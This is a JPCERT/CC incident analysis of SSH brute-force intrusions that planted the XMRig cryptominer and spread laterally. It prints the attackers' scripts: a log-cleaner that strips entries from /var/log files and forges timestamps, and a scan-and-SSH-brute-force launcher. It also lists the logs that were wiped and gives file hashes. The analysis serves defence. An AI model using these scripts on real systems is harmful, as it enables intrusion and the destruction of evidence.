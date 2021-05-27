Publicly-accessible servers have been often targeted for attacks. In recent years, there are cases where these servers are compromised and embedded with a cryptocurrency mining tool. JPCERT/CC confirmed cases with XMRig [1] in February 2021. This article introduces the details of the cases and the tools used.

Initial access/Lateral movement

In one of the recent cases, the attacker made several attempts to access the server with SSH protocol, and eventually logged in with its root account. This server was reachable both from the Internet and intranet. After the intrusion, the attacker conducted SSH brute force attack to other servers on the intranet, moved laterally to several servers and ran a cryptocurrency mining tool XMRig. For its execution, XHide [2] was used to hide process names and delay the detection. Below are the tools found in compromised servers.

File name Contents init XMRig, an open source mining software system bash script to repeatedly execute XMRig h64 XHide, a process hiding tool

Here is the bash script to execute XMRig repeatedly:

#!/bin/bash

While `True`

do

./init

don

Defense evasion

After setting up the mining tool, the attacker deleted the evidence from the compromised servers by replacing the contents of the following logfile with /dev/null.

/var/log/security

/var/log/wtmp

/var/log/btmp

/var/log/utx.lastlog

/var/log/utx.log

The attacker also used the script to delete rows that include specific string from each log file under /var/log. Below is a part of the bash script:

#!/bin/bash



echo " Linux Hider v2.0 by mave"

echo " enhanced by me! "

echo "[+] [Shkupi Logcleaner] Removing $1 from the logs........ ."

echo ""



if [ -f /var/log/maillog ]; then

cat /var/log/maillog | grep -v $1 > /tmp/maillog.xz

touch -acmr /var/log/maillog /tmp/maillog.xz

mv -f /tmp/maillog.xz /var/log/maillog

echo "[+] /var/log/maillog ... [done]"

echo ""

fi



（snipped)



rm -f /tmp/*.xz

echo " * m i s s i o n a c c o m p l i s h e d *"

echo ""

sleep 2

echo " p.h.e.e.r S.H.c.r.e.w"

echo ""

sleep 5

exit 1

Strings except the specific rows are saved in a file in .xz format. Its timestamp is modified, and the contents are overwritten in each log file. Finally, the .xz file is deleted so that there is no evidence of the malicious activity in the log file.

Spread infection

After embedding the mining tool and deleting the log file, the attackers sent a large number of packets to random hosts from the initially compromised server. Below are the tools used in the scanning activity. These are executed by the bash script named “root”, which is mentioned later.

File name Contents ps Shark, a port scan tool [3] ps2 A port scan tool banner A tool to access a specified host and extract banner information from the response prg A tool to read IP address and password list and conduct DDH brute force attacks root A bash script to conduct scan and SSH brute force

The attack script first conducts SYN scanning to check if a specific port is open. It also reads the banner information of the response from the host. If it is determined as a SSH server, SSH brute force is carried out. Below is the bash script:

#!/bin/bash



# PRGSSH v3.2 - 06/Sep/2018

# AUTHOR: PRG @ oldTeam



# ___________________________________________________

# | |

# | ###### ###### ###### ###### ###### ## ## |

# | ## ## ## ## ## ## ## ## ## |

# | ###### ###### ## ### ###### ###### ######## |

# | ## ## ## ## ## ## ## ## ## |

# | ## ## ## ###### ###### ###### ## ## |

# | |

# | VERSION 3.3 - 2018 |

# | CREATED BY PRG |

# | OLDTEAM |

# | FOR TESTING PURPOSES ONLY |

# |___________________________________________________|



#CONFIG

key=PRG-oldTeam # key for scanner ( DO NOT MODIFY )

mode=normal # normal or verbose mode (if you put <verbose>) it will show you print like: Check IP with user

port=3691 # port for bruteforce

uidThreads=500 # threads if you are uid0usrThreads=350 # threads if you are user

banThreads=250 # threads for banner grabber

psSpeed=10 # portscan speed

#END CONFIG



# MOTD

echo "let's see what happens";

# END MOTD



rm -rf bios.txt banner.log



sleep 5



if [[ $UID == 0 || $EUID == 0 ]]; then



echo -e "[+] uid0 detected "



./ps $port -a $1 -s $psSpeed



echo -e "[+] Banner grabber starting... "

sleep 3

./banner bios.txt $port $banThreads



cat banner.log |grep SSH-2.0-OpenSSH |awk '{print $1}' |uniq |shuf >> ips.lst



ipscount=`grep -c . ips.lst`



echo -e "[+] Found $ipscount possible victims "



sleep 10



./prg $uidThreads $port $mode $key



else



echo -e "[+] user detected "



./ps2 $1 $port



echo -e "[+] Banner grabber starting... "



sleep 1



./banner bios.txt $port $banThreads



sleep 3



cat banner.log |grep SSH-2.0-OpenSSH |awk '{print $1}' |uniq |shuf >> ips.lst



sleep 10



echo -e "[+] Start bruteforce attack... "



./prg $usrThreads $port $mode $key



fi

The flow of the attack is illustrated as follows. In the scan and SSH brute force attack to random IP addresses, there were many packets destined to port number 3691. The reason for this choice remains unknown.

Figure 1: Attack flow

In closing

This attack activities are carried out by leveraging existing available tools. Once the intranet is compromised, it is easy for attackers to move laterally across the network especially in the environment where weak username and password are used. The attack technique is nothing new, and the damage can be mitigated by configuring proper SSH access restrictions and SSH public key authentication. Please ensure these measures and watch out for similar malicious activity in the wild.

The hash values of the tools are available in Appendix A.

- Yuma Masubuchi, Kota Kino

(Translated by Yukako Uchida)

Reference

[1] XMRig

https://github.com/xmrig/xmrig

[2] HackTool.Linux.XHide.GA

https://www.trendmicro.com/vinfo/jp/threat-encyclopedia/malware/hacktool.linux.xhide.ga

[3] HKTL_SHARK.GA

https://www.trendmicro.com/vinfo/jp/threat-encyclopedia/malware/hktl_shark.ga

Appendix A Hash value of the tools

These hash values include tools which may also be used in daily operation. Beware of false detection when using this as an indicator of compromise.

init fdfee2487f51446bf7bfb559b0b66de67cc5f6293752413435512ea8869df2e7



systemd ce2d96e360efec9abde87fc26e666774cc92f02e0a4d2659f8afa7cbfdd0d072



h64 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf



ps d328ebb08f6002c6819ecb360a132809d6bed2b7cdea7d2bc6f4a2ce95b27e34



ps2 14779e087a764063d260cafa5c2b93d7ed5e0d19783eeaea6abb12d17561949a



banner 2ef26484ec9e70f9ba9273a9a7333af195fb35d410baf19055eacbfa157ef25



prg 9970b53013dc9cdb23ec69b48743d75ece460d40ab51277d92e665c2dbb73c97

